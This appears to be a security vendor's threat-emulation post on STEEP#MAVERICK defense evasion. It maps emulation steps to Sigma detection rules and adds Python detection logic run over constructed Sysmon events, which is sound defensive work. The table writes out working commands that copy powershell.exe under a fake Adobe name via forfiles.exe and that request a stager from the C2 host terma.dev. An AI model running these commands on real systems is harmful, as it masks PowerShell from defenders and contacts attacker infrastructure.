The next installment of our STEEP#MAVERICK emulation series highlights a defense evasion technique the threat actor used shortly after initial infection. As in many targeted campaigns, initial access begins with a phishing email carrying a malicious attachment. In STEEP#MAVERICK the email contained a compressed (.zip) archive with a shortcut (.lnk) file inside. Rather than launching its payload directly, the shortcut invokes forfiles.exe, a signed Windows utility that runs a command on the caller's behalf, so the malicious command line appears to originate from a trusted system binary (indirect command execution).
Our emulation begins at the point where the threat actor calls forfiles.exe to copy powershell.exe into C:\Windows under the name AdobeAcrobatPDFReader.exe.
We then use the renamed PowerShell binary to query the domain the device belongs to and whether a hypervisor is present (the CsDomain and HyperVisorPresent properties of Get-ComputerInfo). The threat actor did not perform this step in the campaign; we include it to provide a detection opportunity for a renamed PowerShell host.
The following step mimics a C2 connection to hxxps://terma[.]dev/0 to pull down the initial stager. The request is wrapped in try/catch so that a failed or blocked connection simply returns the HTTP status code instead of aborting the emulation, and nothing returned by the server is executed.
Clean-up steps that remove the renamed powershell.exe copy run after a 3-minute delay.
Detection Opportunities
| Step Number | Request | SIGMA Rule(s) | Author(s) |
|---|---|---|---|
| 4 | `run forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe"` | Creation of an Executable by an Executable | frack113 |
| | | Indirect Command Execution | E.M. Anhaus, oscd.community |
| | | Suspicious Copy From or To System32 | Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update) |
| | | Suspicious In-Memory Module Execution | Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro |
| 5 | `run C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent` | Highly Relevant Renamed Binary | Matthew Green - @mgreen27, Florian Roth |
| | | In-memory PowerShell | Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton |
| | | Renamed Binary | Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades) |
| | | Renamed PowerShell | Florian Roth, frack113 |
| | | Suspicious In-Memory Module Execution | Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro |
| 8 | `upsh --cmd Invoke-Command -ScriptBlock { try { $response = Invoke-WebRequest -Uri https://terma.dev/0 -TimeoutSec 15 } catch { $_.Exception.Response.StatusCode.Value__ } }` | Alternate PowerShell Hosts | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| | | Alternate PowerShell Hosts Pipe | Roberto Rodriguez @Cyb3rWard0g, Tim Shelton |
| | | In-memory PowerShell | Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton |
| | | Raw Disk Access Using Illegitimate Tools | Teymur Kheirkhabarov, oscd.community |
| | | Suspicious WSMAN Provider Image Loads | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
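To make the detection opportunities for steps 4, 5 and 8 concrete, the following added example (written for this editorial pass, not SCYTHE code and not the Sigma rules themselves) runs simplified versions of four of the listed detections over constructed Sysmon-style events. The event records, the field names (Sysmon Event ID 1 ProcessCreate and Event ID 7 ImageLoad), the GAC path for the PowerShell engine assembly and the `upsh.exe` host path are all assumptions made for illustration; the matching logic approximates the idea behind the named Sigma rules rather than reproducing their exact selections.

```python
"""Simplified detections for the STEEP#MAVERICK emulation steps.

Constructed Sysmon-style events (not real telemetry) are matched against
approximations of four of the Sigma rules listed in the table above.
"""
import re

# Constructed sample events modelled on steps 4, 5 and 8, plus a benign control.
SAMPLE_EVENTS = [
    {   # step 4: forfiles.exe proxies a copy of powershell.exe out of System32
        "EventID": 1,
        "Image": r"C:\Windows\System32\forfiles.exe",
        "OriginalFileName": "forfiles.exe",
        "CommandLine": r'forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe"',
    },
    {   # step 5: the renamed copy runs; the PE OriginalFileName still says PowerShell.EXE
        "EventID": 1,
        "Image": r"C:\Windows\AdobeAcrobatPDFReader.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r"C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent",
    },
    {   # step 8: a non-PowerShell host process loads the PowerShell engine (path assumed)
        "EventID": 7,
        "Image": r"C:\Users\victim\upsh.exe",
        "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll",
    },
    {   # benign control: the genuine powershell.exe must not trigger anything
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -Command Get-Date",
    },
]

# Process names in which the PowerShell engine is expected to run.
LEGIT_POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# PE OriginalFileName values carried by Windows PowerShell and pwsh binaries.
POWERSHELL_ORIGINAL_NAMES = {"powershell.exe", "pwsh.dll"}
# Signed Windows binaries that run an arbitrary command on the caller's behalf.
COMMAND_PROXIES = {"forfiles.exe", "pcalua.exe"}


def basename(path: str) -> str:
    """Last component of a Windows-style path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indirect_command_execution(ev: dict) -> bool:
    """A command-proxy LOLBin launched with a /c payload (step 4)."""
    return (ev.get("EventID") == 1
            and basename(ev.get("Image", "")) in COMMAND_PROXIES
            and " /c " in ev.get("CommandLine", "").lower())


def suspicious_system32_copy(ev: dict) -> bool:
    """A copy-style command whose command line touches \\System32\\ (step 4)."""
    cmd = ev.get("CommandLine", "").lower()
    return (ev.get("EventID") == 1
            and "\\system32\\" in cmd
            and re.search(r"\b(copy|xcopy|robocopy|copy-item)\b", cmd) is not None)


def renamed_powershell(ev: dict) -> bool:
    """Image name differs from the PowerShell OriginalFileName in the PE header (step 5)."""
    return (ev.get("EventID") == 1
            and ev.get("OriginalFileName", "").lower() in POWERSHELL_ORIGINAL_NAMES
            and basename(ev.get("Image", "")) not in LEGIT_POWERSHELL_HOSTS)


def alternate_powershell_host(ev: dict) -> bool:
    """System.Management.Automation loaded by a process that is not a PowerShell host (step 8)."""
    return (ev.get("EventID") == 7
            and basename(ev.get("ImageLoaded", "")).startswith("system.management.automation")
            and basename(ev.get("Image", "")) not in LEGIT_POWERSHELL_HOSTS)


RULES = {
    "Indirect Command Execution": indirect_command_execution,
    "Suspicious Copy From or To System32": suspicious_system32_copy,
    "Renamed PowerShell": renamed_powershell,
    "Alternate PowerShell Hosts": alternate_powershell_host,
}


def run_detections(events: list) -> dict:
    """Return {rule name: [Image of every matching event]}; every rule is always present."""
    hits = {name: [] for name in RULES}
    for ev in events:
        for name, check in RULES.items():
            if check(ev):
                hits[name].append(ev["Image"])
    return hits


if __name__ == "__main__":
    for name, images in run_detections(SAMPLE_EVENTS).items():
        print(f"{name}: {images or 'no hits'}")
```

The point of the renamed-PowerShell check is that copying the binary changes the path but not the PE header, so `OriginalFileName` survives the rename; the alternate-host check works the same way on the engine DLL, which any process that hosts PowerShell must load regardless of what the process is called.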
This post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.